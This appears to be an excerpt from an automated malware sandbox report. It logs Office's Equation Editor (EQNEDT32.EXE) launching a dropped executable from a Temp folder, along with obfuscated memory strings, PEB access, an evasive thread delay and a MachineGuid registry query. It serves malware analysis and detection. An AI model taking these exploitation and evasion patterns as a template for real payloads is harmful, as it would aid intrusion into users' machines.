Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: EQNEDT32.EXE |
Binary or memory string: hgkQx0bZZLJUrWxFmRPXH5Fsqo11MpdW7y4iFnOnBgrEaVSPNLYW4TshKdjMsbOzRssqClqFKcptnKiVR7MlMYdNRpaXBDtWntYcVysEChfG80eo8HF1qOQDLuzIxh0PLZVooQOzuQk7FYBbaMc58z9UBRMRq5fwFR8ClBIqeMUEp2DBytrkvNiT6v5kVPmNf2rZ2EV3Z1IPUSdnSPPmqc2TItZzbhF0ks4hHeutoxaQusMkBSexYi0kstFwlzx6eUCN |
Source: EQNEDT32.EXE |
Binary or memory string: ypwyU1OsJGoI9gzmwpH0ELmWtubn8HTSbmYovpXdNywAoujLuu5PbVYYmIJ2HCmQ0hS2SdxpQzOJu4uqKsVD0mAHqOA5Igb5YPIgyioyr6pkLRfobVBSMTnDVxqw817yfekmOMGb54uW2KClAZoAZsbuAnydfVRdlERMcpSFWhGfszcFOr0MXEitDfEEnPlZEv3RYPXQYlaCmh7nh9R69rJg5MHiS1ELUVF56Ohhb2WAflquVDmOM1YoAelAXbzSwleI |
Source: EQNEDT32.EXE |
Binary or memory string: UfbNZoESc6NLHOvdpfYbWygLBie8xAB8UF5CCYC8rXcwQ89Z8UylnvcEQFCy0JozdgH8li5ItoZiIxPg8PJQpowFXP9s7YQA3UbxvMnEtUcRYsbF1yyMHiWehjtcvvvxvCSSKVFCz49uqwcYviMLocJl2iq06RCcPLFOeBKVN6ctpAOt1AtB4aBpjvPnJ8BReTMYWRyPA7OA9boXRqxdid39vrzlC3lio5EkbI4DXdsXUGmlNIzUPnq0m5ziPDqi2kGi |
Source: EQNEDT32.EXE |
Binary or memory string: rEBr304tHgFsyzPPcXV8dAreVTPm9lBvcw6qv32bDfylApbmd54oUsycozejFWgyisg6C6HowVMtrRgj9QXz8PqWXRJejP6ZS9S2fnnOkMwgpVgBQgT3NRVHzzwwN3Rb6vw48odHvNGYpfd2k1OO0b1lRn4zw8lzwNgaLmoMjkptgZZCQcqRlYOvB0DDFI4dFeC16ONZSaB68uWZhcKbSyeeTmv13DPSKu1lBGMmO5scyIV3tAOHsUqpcGio8VoKRIiC |
Source: EQNEDT32.EXE |
Binary or memory string: eL6Q7la1TPigYMZLFUoxYNz1napOC0vPdcZ8aUz4VseqEmuNqZzBcxzwIENLfha9DMtXGsdf8nUUjzCsIJPvOdrUB1j6x8JwvyrH9qnxtZ3G6rg098rpuMspxMgJ8BNwIrF1IJl7Ja5pLKfuuR7ZB1L6Af0dDn5HqQoQj9nIwGPpVIQj8dxnHXWTKKUjEpi875N8TIBdI1lwceEeL7A9Cnh50lvGCEWeeFhnZdEKtExniJNo4IXIzhA7gN4sBtp0xJY6 |
Source: EQNEDT32.EXE |
Binary or memory string: enqSmw50XklvAzsJAlS1muLkliuLOtKMkouxDqjvFCZ0Pk1VbMs6bGmvpk6tLA7HA6MXgsGOY95Caz1Q8xZaUgFEjUONkLOzQ6zpEwzax269jb8DGxK6S62p1MaSdMQe5BaVtvAd0FPWqUf2ZkwLYOQsElQn06WQemuDgk5iEBkyzZs3XjBwoThXr5j1vUvTfHkceI2yAGw9Cj4QjLpZFF8wSlFoQQxwf6tNoWHZKskjTuUIfyfstc1HZBnpVorzAe78 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361079C mov edx, dword ptr fs:[00000030h] |
1_2_0361079C |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: page read and write | page guard |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Queries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformation |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |